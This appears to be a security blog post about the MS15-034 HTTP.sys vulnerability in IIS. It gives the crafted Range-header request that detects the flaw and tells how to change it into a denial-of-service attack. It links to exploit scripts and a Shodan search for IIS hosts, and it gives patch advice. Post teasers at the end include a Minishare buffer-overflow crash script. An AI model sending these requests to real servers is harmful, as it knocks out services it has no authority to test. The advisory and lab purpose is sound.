HTTP.sys (IIS) DoS And Remote Code Execution

Description:

Denial of Service (DoS) exploits are widely available to exploit CVE-2015-1635, a vulnerability in HTTP.sys, affecting Internet Information Server (IIS). The patch was released on Tuesday (April 14th) as part of Microsoft's Patch Tuesday.
Due to the ease with which this vulnerability can be exploited, we recommend that you expedite patching this vulnerability.

Risk
Critical
CVSS Score
10.0
CVE
CVE-2015-1635

Proof of Concept: 

Method 1:

Download nmap script from the following https://github.com/pr4jwal/quick-scripts/blob/master/ms15-034.nse  Save the file in the script folder (/usr/share/nmap/scripts/) If the server is vulnerable it will show the following.
Method 2:
Send the following request to your IIS server:
GET / HTTP/1.1
Host: MS15034
Range: bytes=0-18446744073709551615
If the server responds with "Requested Header Range Not Satisfiable", then you may be vulnerable


To launch Denial of service DoS attack:
In the example PoC above, change the "0-" to "20-". (has to be smaller then the size of the file retrieved, but larger then 0)
Solutions:
Update windows or Apply windows patches for all the windows servers immediately.
https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
The following screenshot determines that appropriate patch for ms15-034 in installed:
 


https://support.microsoft.com/en-us/kb/3042553

Extra resources:
Microsoft Link: https://technet.microsoft.com/library/security/ms15-034
Metasploit: https://github.com/rapid7/metasploit-framework/pull/5150
DoS script in C language:
- http://www.exploit-db.com/exploits/36773/
- https://ghostbin.com/paste/semkg
DoS script in Python:
- http://pastebin.com/raw.php?i=ypURDPc4 
- http://pastebin.com/wWGFFZpG
DoS script with Ruby (@John Woods)
- https://github.com/secjohn/ms15-034-checker
Dos with telnet: https://twitter.com/NexusFandom/status/588254994203303937/photo/1
DoS with wget: https://twitter.com/w3bd3vil/status/588339547898941440
Some article: https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/
Plugin of IDAPro for diff: https://github.com/joxeankoret/diaphora
Shodan: https://www.shodan.io/search?query=IIS
Discussion:  https://github.com/rapid7/metasploit-framework/pull/5150
Memory Leak: https://www.cloudshark.org/captures/0132eb74ecd3
XMLRequest: http://pastebin.com/raw.php?i=SbN55M2H 

Refrences:

 https://isc.sans.edu/diary/MS15-034%3A+HTTP.sys+%28IIS%29+DoS+And+Possible+Remote+Code+Execution.+PATCH+NOW/19583

Comments

Post a Comment

Popular posts from this blog

MY OSCP REVIEW

Image
MY OSCP REVIEW About me I am just a guy who has done B.E (Computer Engineering), C.E.H and I am doing vulnerability assessment for different clients in Mumbai. Inspiration to do OSCP Wanted to read technical stuff only then skip this para. Like other guyz I thought that OSCP is one of the most difficult task in the world of IT Security. And yes, it is one the difficult mission you could ever face. Back in Dec 2014 I was really bored with the conventional vulnerability assessment thing, I wanted to do some more exploitation and some black hat stuff. But in our job we were not allowed to do so, as the environment used to be critical most of the time and time for completing the task was less. So I asked few question on some group in facebook regarding How can I learn more exploitation stuff. There was a guy with the name Mr.WhiteW0rm who have given me a brilliant answer and recommended me to do OSCP. That time I thought though I won't be able to do OSCP but at least I
Read more

Minishare 1.4.1 Bufferoverflow

Image
You can download the server from: https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0 Exploit code in ruby: https://www.exploit-db.com/exploits/616/ The vulnerability is a long URL in the GET request. Eg:- GET AAAAAAAAAAAAAAAA..... HTTP/1.1 Lab Setup: 1) Windows xp ( I am using windows xp sp1) 2) Immunity debugger installed on the windows xp machine. 3) Minishare 1.4.1 installed on windows xp running on port 80. 2) Kali linux for scripting and exploiting. Configure the victim: I have installed Minishare server 1.4.1 and it is listening for connections on port 80, as depicted below. Generate Sample script to crash: We will try to smash the stack by sending a buffer of 2000 A's with the help of the following script. #!/usr/share/python import socket,sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((sys.argv[1],80)) buff="GET " buff+="A"*2000 buff+=" HTTP/1.1\r\n\r\n" s.send(buff) s.close
Read more